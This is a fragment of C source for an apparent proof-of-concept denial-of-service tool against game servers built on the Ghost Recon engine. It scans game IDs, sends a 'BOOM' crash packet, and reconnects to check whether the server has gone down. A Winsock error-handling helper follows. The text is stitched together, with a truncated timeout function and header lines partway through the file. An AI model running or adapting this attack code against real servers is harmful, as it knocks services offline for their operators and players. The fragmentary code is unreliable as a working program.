if(argc < 2) { printf("\n" "Usage: %s [options] <server>\n" "\n" "Options:\n" "-p PORT choose the port of the remote server (%d)\n" "-i ID this is a number from 0 to 255 to launch the proof-of-concept versus\n" " a specific game if we already know it:\n" " - Ghost Recon: 20\n" " - The sum of all Fears: 14\n" " By default this tool uses a sequential ID scanner that finds the\n" " right ID without problems, so use this option only if you want to be\n" " faster\n" "\n", argv[0], PORT); exit(1); }
printf("\nConnection to %s:%hu\n", inet_ntoa(peer.sin_addr), port);
if(!id) { fputs("\n" "Now I launch an ID scanning (max 255 numbers) trying to make this proof-of-concept compatibles with any game based on the Ghost Recon engine:\n", stdout); }
for(pck1[5] = id; pck1[5] < 0xff; pck1[5]++) { printf("\nTrying with ID 0x%02x: ", pck1[5]);
SEND(pck1); RECV; if(*buff != 0x42) WRONG; if(buff[3] == 0xbf) { if(id) { fputs("\n- Server is full or has not accept the request\n", stdout); exit(1); } fputs("\n- Server is full or has not accept the request, continue scanning", stdout); close(sd); continue; }
/* BOOM */ SEND(S2); fputs("\n\n* BOOM data sent to the server!\n", stdout); close(sd);
if(id) break; }
/* double check */ fputs("\n\n- I check if the server is really down or not, wait a moment\n", stdout); for(wait = TWAIT; wait != 0; wait--) { printf("%3d\r", wait); sleep(ONESEC); }
fputs("\n- connection...", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); err = connect(sd, (struct sockaddr *)&peer, sizeof(peer)); if(err < 0) fputs("\nThe server is vulnerable!!!\n\n", stdout); else fputs("\nThe server is NOT vulnerable\n\n", stdout);
close(sd); return(0); }
int timeout(int sock) { struct timeval tout; fd_set fd_read; int err;
/* Header file used for manage errors in Windows It support socket and errno too (this header replace the previous sock_errX.h) */
#include <string.h> #include <errno.h>
void std_err(void) { char *error;
switch(WSAGetLastError()) { case 10004: error = "Interrupted system call"; break; case 10009: error = "Bad file number"; break; case 10013: error = "Permission denied"; break; case 10014: error = "Bad address"; break; case 10022: error = "Invalid argument (not bind)"; break; case 10024: error = "Too many open files"; break; case 10035: error = "Operation would block"; break; case 10036: error = "Operation now in progress"; break; case 10037: error = "Operation already in progress"; break; case 10038: error = "Socket operation on non-socket"; break; case 10039: error = "Destination address required"; break; case 10040: error = "Message too long"; break; case 10041: error = "Protocol wrong type for socket"; break; case 10042: error = "Bad protocol option"; break; case 10043: error = "Protocol not supported"; break; case 10044: error = "Socket type not supported"; break; case 10045: error = "Operation not supported on socket"; break; case 10046: error = "Protocol family not supported"; break; case 10047: error = "Address family not supported by protocol family"; break; case 10048: error = "Address already in use"; break; case 10049: error = "Can't assign requested address"; break; case 10050: error = "Network is down"; break; case 10051: error = "Network is unreachable"; break; case 10052: error = "Net dropped connection or reset"; break; case 10053: error = "Software caused connection abort"; break; case 10054: error = "Connection reset by peer"; break; case 10055: error = "No buffer space available"; break; case 10056: error = "Socket is already connected"; break; case 10057: error = "Socket is not connected"; break; case 10058: error = "Can't send after socket shutdown"; break; case 10059: error = "Too many references, can't splice"; break; case 10060: error = "Connection timed out"; break; case 10061: error = "Connection refused"; break; case 10062: error = "Too many levels of symbolic links"; break; case 10063: error = "File name too long"; break; case 10064: error = "Host is down"; break; case 10065: error = "No Route to Host"; break; case 10066: error = "Directory not empty"; break; case 10067: error = "Too many processes"; break; case 10068: error = "Too many users"; break; case 10069: error = "Disc Quota Exceeded"; break; case 10070: error = "Stale NFS file handle"; break; case 10091: error = "Network SubSystem is unavailable"; break; case 10092: error = "WINSOCK DLL Version out of range"; break; case 10093: error = "Successful WSASTARTUP not yet performed"; break; case 10071: error = "Too many levels of remote in path"; break; case 11001: error = "Host not found"; break; case 11002: error = "Non-Authoritative Host not found"; break; case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break; case 11004: error = "Valid name, no data record of requested type"; break; default: error = strerror(errno); break; } fprintf(stderr, "\nError: %s\n", error); exit(1); }
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.